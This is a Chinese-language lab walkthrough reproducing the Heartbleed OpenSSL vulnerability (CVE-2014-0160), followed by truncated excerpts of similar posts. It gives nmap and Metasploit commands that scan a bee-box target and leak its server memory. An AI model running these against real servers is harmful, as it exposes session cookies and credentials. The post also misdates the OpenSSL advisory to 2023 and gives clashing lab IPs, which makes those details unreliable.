心臟滴血漏洞復現 CVE 2014 0160

2022-07-19 19:06:10 字數 1690 閱讀 2879

心臟滴血漏洞簡述

2023年4月7日,openssl發布安全公告,在openssl1.0.1版本至openssl1.0.1f beta1版本中存在漏洞,該漏洞中文名稱為心臟滴血,英文名稱為heartbleed。其中heart是指該漏洞位於心跳協議上,bleed是因為該漏洞會造成資料洩露。即heartbleed是在心跳協議上的乙個資料洩露漏洞,openssl庫中用到了該心跳協議。heartbleed主要存在與openssl的1.0.1版本到1.0.1f版本。

利用該漏洞,攻擊者可以遠端讀取伺服器記憶體中64k的資料,獲取記憶體中的敏感資訊。

漏洞範圍

openssl 1.0.1版本

ssl、tls、dtls介紹

在網路當中中,tcp/ip協議層之上的安全可以由secure socket layer(ssl)及其替代協議transport layer security (tls)進行保障。這兩個協議經常被稱作ssl/tls。http是乙個無狀態的應用層協議,主要用來在伺服器和客戶端之間傳輸資料。https主要通過在http層和tcp層之間增加了ssl/tls層來保證伺服器與客戶端之間安全的傳輸資料。

dtls(datagram transport layer security)即資料報傳輸層安全性協議,主要是試圖在tls協議架構上提出擴充套件,使之支援udp。

tls/dtls中的心跳協議主要使用來檢測兩個裝置之間是否還有連線的,根據rfc規定,心跳協議執行在tls記錄層之上,主要是通過交換「心跳」的方式,用來維持端與端之間的連線。

環境 搭建  kali—》192.168.115.28

bee-box—》192.168.115.21

啟動靶機  

確定目標及埠資訊。這裡存在漏洞的靶機埠為

8443

使用nmap  指定指令碼掃瞄

nmap -sv -p 8443 --script ssl-heartbleed.nse 192.168.115.27

由下圖檢測結果可以看出存在心臟滴血漏洞

上也有乙個專案,是專門檢測心臟滴血漏洞的。

使用msf

進行漏洞利用

開啟msfconsole

後,查詢

heartbleed

模組:search heartbleed

use auxiliary/scanner/ssl/openssl_heartbleed

set rhosts 192.168.115.27

set rport 8443

set verbose true  #(設定

verbose

,這個設定要設定成

true

才能看到洩露的資訊)

心臟滴血漏洞復現 CVE 2014 0160

一 什麼是心臟滴血 心臟出血漏洞 是指openssl這個開源軟體中的乙個漏洞,因為該軟體使用到乙個叫做heartbeat 中文名稱為心跳 的擴充套件,恰恰是這個擴充套件出現了問題,所以才將這個漏洞形象的稱為 心臟出血 二 什麼是openssl 在計算機網路上,openssl是乙個開放源 的軟體庫包,...

心臟滴血漏洞復現(CVE 2014 0160)

漏洞範圍 openssl 1.0.1版本 漏洞成因 heartbleed漏洞是由於未能在memcpy 呼叫受害使用者輸入內容作為長度引數之前正確進 行邊界檢查。攻擊者可以追蹤openssl所分配的64kb快取 將超出必要範圍的位元組資訊復 製到快取當中再返回快取內容,這樣一來受害者的記憶體內容就會以...

OpenSSL 「心臟滴血」漏洞

漏洞描述 openssl 軟體存在 心臟出血 漏洞,該漏洞使攻擊者能夠從記憶體中讀取多達 64 kb 的資料,造成資訊洩露。漏洞危害 可被用來獲取敏感資料,包括會話 session cookie 賬號密碼等。修復方案 以下為各系統的修復方案供您參考 第一步 debian ubuntu apt get...